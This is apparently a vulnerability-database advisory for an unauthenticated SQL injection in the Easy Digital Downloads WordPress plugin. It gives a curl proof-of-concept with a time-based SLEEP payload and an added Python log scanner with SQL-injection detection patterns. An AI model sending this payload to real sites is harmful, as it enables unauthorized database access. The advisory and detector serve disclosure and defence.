WordPress Plugin Vulnerabilities
Easy Digital Downloads 3.1.0.2 & 3.1.0.3 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape the `s` parameter before using it in a SQL statement via the `edd_download_search` AJAX action, leading to a SQL injection exploitable by unauthenticated users.
Proof of Concept
curl "https://example.com/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"
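As an added example (not part of the WPScan entry and not the plugin's own code), a small detection check for web-server logs: it picks out requests to `admin-ajax.php` with `action=edd_download_search` and flags an `s` value that carries SQL-injection markers like the time-based payload above. The log lines are constructed, and the marker list is a heuristic, not an exhaustive rule.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Heuristic markers (constructed, not exhaustive): a quote followed by a SQL
# keyword, a comment sequence, or a timing function such as SLEEP()/BENCHMARK().
SQLI_MARKERS = re.compile(
    r"['\"].*\b(and|or|select|union)\b|--|/\*|\bsleep\s*\(|\bbenchmark\s*\(",
    re.I | re.S,
)

# Request part of a common-log-format line: method, target, protocol
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def extract_edd_search(line):
    """Return the decoded `s` value when the line is a request to the
    edd_download_search AJAX action on admin-ajax.php, otherwise None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+'
    if qs.get("action", [""])[0] != "edd_download_search":
        return None
    return qs.get("s", [""])[0]

def is_suspicious(s_value):
    """True when the search term carries SQL-injection markers."""
    return bool(SQLI_MARKERS.search(s_value))

def scan(lines):
    """Return (client_ip, decoded s value) for each suspicious request."""
    hits = []
    for line in lines:
        s_value = extract_edd_search(line)
        if s_value is not None and is_suspicious(s_value):
            hits.append((line.split()[0], s_value))
    return hits

# Constructed sample access-log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jan/2023:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=edd_download_search&s=ebook HTTP/1.1" 200 312',
    '203.0.113.7 - - [12/Jan/2023:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+- HTTP/1.1" 200 45',
    '203.0.113.9 - - [12/Jan/2023:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 50',
]

if __name__ == "__main__":
    for ip, payload in scan(SAMPLE_LOG):
        print(f"{ip} suspicious edd_download_search s={payload!r}")
```

A benign search term such as `ebook` is not flagged; only the second constructed line, carrying the quote, `SELECT`, `SLEEP(` and `--` markers, is reported.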
Classification
Type
SQLI
Miscellaneous
Original Researcher
Joshua Martinelle (Tenable)
Verified
No
Timeline
Publicly Published
2023-01-12 (about 1 year ago)
Added
2023-01-20 (about 1 year ago)
Last Updated
2023-01-20 (about 1 year ago)